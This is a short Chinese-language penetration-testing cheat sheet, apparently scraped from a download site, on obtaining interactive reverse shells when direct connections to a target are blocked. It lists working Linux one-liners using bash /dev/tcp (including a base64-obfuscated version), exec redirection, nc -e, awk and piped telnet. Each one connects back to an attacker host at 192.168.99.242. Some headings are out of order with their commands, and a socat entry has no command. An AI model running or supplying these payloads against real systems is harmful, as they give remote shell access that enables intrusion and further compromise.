在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续
深入。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。
所有姿势,默认情况下,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。
Linux 反弹shell
姿势一:bash反弹
其他版本:
姿势二:nc反弹
姿势三:awk反弹
姿势四:telnet反弹
备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令
执行后的结果。
姿势五:socat反弹
bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|
{base64,-d}|{bash,-i}'
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
nc -e /bin/bash 192.168.99.242 1234
awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline
c;close(c))while(c|getline)print|&s;close(s)}'
telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321
资源评论
吉吉说安全
- 粉丝: 1102
最新资源
- 电气自动化技术专业教学团队推荐表.doc
- 2023年公共关系学网络终考题库2.doc
- 移动通信技术的发展.doc
- 计算机网络技术专业培养计划.doc
- 商业计划书(上海润金软件有限公司交易助理项目).doc
- 医学统计学第十六章--Logistic回归分析.ppt
- 基于PLC的自动摆饼机控制系统的设计及实现(顾小强).ppt
- 粤教版网络技术应用教材与教学研讨市公开课一等奖百校联赛特等奖课件.pptx
- 互联网金融个体网络借贷资金存管业务规范.docx
- 解读云计算与云数据存储发展趋势技术研究.doc
- 综合布线建设方案.doc
- 基于C51单片机的数字时钟课程设计C语言,带闹钟.doc
- 谭浩强C语言第13章.ppt
- 大学生网络利用调查报告.doc
- 2023年学员做试卷中小学教师融合教育知识网络竞赛.docx
- 互联网项目商业计划书模板.doc
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
